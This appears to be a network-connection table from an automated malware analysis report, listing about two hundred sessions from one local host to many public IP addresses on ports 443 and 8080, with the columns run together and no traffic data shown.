                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21250192.168.2.145993827.165.1.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21251192.168.2.1433786170.112.171.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21252192.168.2.143806276.46.21.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21253192.168.2.1437516136.167.176.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21254192.168.2.143633871.243.161.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21255192.168.2.1459404162.200.3.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21256192.168.2.1449114166.149.174.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21257192.168.2.144788624.184.182.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21258192.168.2.1446230216.108.35.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21259192.168.2.1440886180.114.16.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21260192.168.2.144369682.37.123.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21261192.168.2.1439410103.154.122.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21262192.168.2.1434460217.25.229.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21263192.168.2.145105036.132.88.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21264192.168.2.1452874130.151.243.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21265192.168.2.144245254.120.121.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21266192.168.2.1432810189.200.23.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21267192.168.2.144183266.98.246.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21268192.168.2.1455250119.224.69.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21269192.168.2.1447770206.217.163.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21270192.168.2.1443318164.168.113.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21271192.168.2.1434214115.207.180.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21272192.168.2.144137040.188.156.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21273192.168.2.1457500108.145.183.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21274192.168.2.145326482.46.195.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21275192.168.2.1458718134.24.220.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21276192.168.2.144647031.43.231.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21277192.168.2.1433150151.21.110.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21278192.168.2.14567628.145.247.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21279192.168.2.1456900100.146.70.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21280192.168.2.143485698.233.154.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21281192.168.2.1437154175.143.17.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21282192.168.2.1435246197.26.44.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21283192.168.2.1447722172.87.30.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21284192.168.2.144315032.87.108.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21285192.168.2.1454418141.233.40.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21286192.168.2.1441984179.122.2.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21287192.168.2.1450120152.131.112.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21288192.168.2.1459212174.124.205.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21289192.168.2.1444798117.151.72.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21290192.168.2.145617082.240.0.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21291192.168.2.1435652196.53.106.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21292192.168.2.1459016143.41.189.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21293192.168.2.145246250.250.7.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21294192.168.2.1439142104.72.64.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21295192.168.2.144562281.23.53.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21296192.168.2.145064476.127.32.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21297192.168.2.1432862106.229.37.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21298192.168.2.1455034180.39.95.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21299192.168.2.1438432114.29.12.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21300192.168.2.14590502.65.50.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21301192.168.2.145956258.116.0.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21302192.168.2.1448842136.118.138.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21303192.168.2.1443688189.108.214.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21304192.168.2.1442312125.114.30.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21305192.168.2.1439794150.37.78.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21306192.168.2.1446782160.88.245.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21307192.168.2.1449590121.160.125.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21308192.168.2.143814052.133.119.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21309192.168.2.1458652104.41.27.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21310192.168.2.1436818130.27.46.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21311192.168.2.1448096114.87.253.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21312192.168.2.145576042.39.242.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21313192.168.2.146000650.188.139.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21314192.168.2.1436554186.103.79.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21315192.168.2.145975446.201.197.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21316192.168.2.1455990152.89.90.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21317192.168.2.1438868132.140.191.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21318192.168.2.143827687.252.118.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21319192.168.2.1453672182.167.250.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21320192.168.2.1433642121.114.75.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21321192.168.2.144787694.137.177.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21322192.168.2.1444142131.174.97.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21323192.168.2.145036419.83.129.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21324192.168.2.1448498138.51.186.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21325192.168.2.145266864.240.177.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21326192.168.2.1445628217.235.183.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21327192.168.2.145877214.88.191.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21328192.168.2.1446060168.133.16.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21329192.168.2.145934680.69.92.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21330192.168.2.1456416102.209.167.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21331192.168.2.143965675.31.174.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21332192.168.2.144057678.249.206.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21333192.168.2.145961834.187.84.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21334192.168.2.145931043.199.98.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21335192.168.2.1434626206.88.140.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21336192.168.2.1459600152.198.141.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21337192.168.2.143421632.200.41.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21338192.168.2.1434852197.221.9.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21339192.168.2.145221274.124.183.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21340192.168.2.1433560202.92.220.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21341192.168.2.1447334179.67.68.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21342192.168.2.1434148101.216.139.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21343192.168.2.144816676.253.26.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21344192.168.2.143792249.253.132.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21345192.168.2.144301099.233.16.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21346192.168.2.1435218129.88.185.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21347192.168.2.144251270.91.7.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21348192.168.2.1452566126.27.138.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21349192.168.2.143788877.240.65.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21350192.168.2.1459244223.92.174.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21351192.168.2.1433426103.115.88.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21352192.168.2.1448516132.44.152.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21353192.168.2.145743486.215.124.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21354192.168.2.145971639.108.35.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21355192.168.2.144010080.146.137.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21356192.168.2.145568858.145.10.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21357192.168.2.144258223.252.177.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21358192.168.2.1458156206.45.211.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21359192.168.2.145553296.249.53.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21360192.168.2.1455488116.24.163.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21361192.168.2.143286895.78.120.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21362192.168.2.1444756115.248.186.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21363192.168.2.143543880.203.236.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21364192.168.2.143823825.182.151.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21365192.168.2.145730438.0.20.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21366192.168.2.143925299.252.61.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21367192.168.2.145974649.79.222.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21368192.168.2.145831017.164.87.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21369192.168.2.144055223.150.195.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21370192.168.2.145794836.248.107.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21371192.168.2.1452860196.69.8.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21372192.168.2.1436936213.4.17.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21373192.168.2.145201458.69.99.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21374192.168.2.145997878.202.152.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21375192.168.2.144771069.139.244.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21376192.168.2.1443606113.126.235.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21377192.168.2.1459980123.251.179.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21378192.168.2.1437326199.73.79.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21379192.168.2.144292880.125.67.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21380192.168.2.1450174206.1.110.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21381192.168.2.145527027.76.124.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21382192.168.2.1433546147.57.164.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21383192.168.2.1451492200.11.167.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21384192.168.2.145754060.52.6.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21385192.168.2.145481660.229.135.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21386192.168.2.143860831.178.46.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21387192.168.2.1453916198.8.78.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21388192.168.2.1439572183.136.38.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21389192.168.2.1435846186.113.213.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21390192.168.2.144544836.150.157.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21391192.168.2.143336258.202.223.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21392192.168.2.1458942166.33.146.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21393192.168.2.1433508137.75.140.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21394192.168.2.145534654.50.153.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21395192.168.2.1450306140.53.238.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21396192.168.2.146040845.118.230.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21397192.168.2.144503427.156.81.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21398192.168.2.143637659.106.215.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21399192.168.2.1456704194.145.137.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21400192.168.2.143328889.45.215.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21401192.168.2.143672299.30.170.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21402192.168.2.1438418164.201.226.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21403192.168.2.143424624.141.100.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21404192.168.2.1451106195.106.171.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21405192.168.2.143620292.136.67.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21406192.168.2.144447227.110.11.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21407192.168.2.1452996153.143.219.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21408192.168.2.1457422177.185.203.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21409192.168.2.1449798137.0.226.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21410192.168.2.1452756180.59.71.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21411192.168.2.1440768132.3.202.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21412192.168.2.1443262131.254.11.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21413192.168.2.143745835.27.139.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21414192.168.2.1442576186.61.67.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21415192.168.2.145071254.212.218.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21416192.168.2.1452770189.72.46.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21417192.168.2.1452808148.201.61.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21418192.168.2.144752464.241.144.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21419192.168.2.145000885.145.232.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21420192.168.2.144609440.183.157.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21421192.168.2.145762893.135.185.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21422192.168.2.1447176131.102.247.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21423192.168.2.143666014.255.224.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21424192.168.2.1449250139.68.52.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21425192.168.2.1449602150.99.99.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21426192.168.2.145779825.103.161.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21427192.168.2.1459092135.112.34.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21428192.168.2.1442422196.161.231.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21429192.168.2.144652063.63.243.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21430192.168.2.1443826157.152.117.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21431192.168.2.144234660.69.232.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21432192.168.2.144371825.109.109.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21433192.168.2.1454306218.32.134.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21434192.168.2.1450788122.129.129.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21435192.168.2.143517825.176.110.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21436192.168.2.143658849.63.132.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21437192.168.2.145694898.111.253.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21438192.168.2.1438876188.131.112.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21439192.168.2.1435454128.178.207.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21440192.168.2.1450546134.224.82.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21441192.168.2.1455274164.130.150.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21442192.168.2.1450506130.145.76.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21443192.168.2.143371462.31.104.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21444192.168.2.1440314213.254.131.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21445192.168.2.144735485.130.251.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21446192.168.2.14541981.129.2.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21447192.168.2.145651827.169.179.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21448192.168.2.1445082137.87.89.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21449192.168.2.1460490175.234.205.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21450192.168.2.1448778143.244.203.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21451192.168.2.1442780103.143.59.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21452192.168.2.145922888.95.250.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21453192.168.2.146026251.226.140.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21454192.168.2.1434096209.164.42.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21455192.168.2.14518189.122.63.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21456192.168.2.1447626220.232.207.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21457192.168.2.1442610208.153.5.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21458192.168.2.1444288128.152.183.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21459192.168.2.145258246.182.102.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21460192.168.2.1452348208.174.139.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21461192.168.2.143479477.90.122.160443
                                                        TimestampBytes transferredDirectionData


